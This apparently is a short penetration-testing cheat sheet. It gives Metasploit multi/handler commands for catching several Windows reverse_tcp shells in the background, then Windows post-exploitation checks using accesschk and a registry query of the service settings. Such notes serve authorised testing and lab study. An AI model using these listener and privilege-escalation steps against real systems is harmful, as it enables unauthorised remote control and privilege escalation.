ip -4 addr show scope global    /*Determine interfaces ip address + prefix*/
ip route show | grep default    /*Determine which interface is public*/
-----------------------------------------------------------------------------------------------------
In order to get multiple session on a single multi/handler, 
you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. 
For example, for shell/reverse_tcp payload,

msf>use exploit multi/handler
msf>set payload windows/shell/reverse_tcp
msf>set lhost <local IP>
msf>set lport <local port>
msf> set ExitOnSession false
msf>exploit -j

The -j option is to keep all the connected session in the background.
----------------------------------------------------------------------------
*********** Post - privs escalation ***********

* Accesschk stuff
accesschk.exe /accepteula (first thing to do in CLI access)
accesschk.exe /accepteula -ucqv [service_name]
accesschk.exe /accepteula -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
accesschk.exe /accepteula -ucqv [service_name]

reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ /s

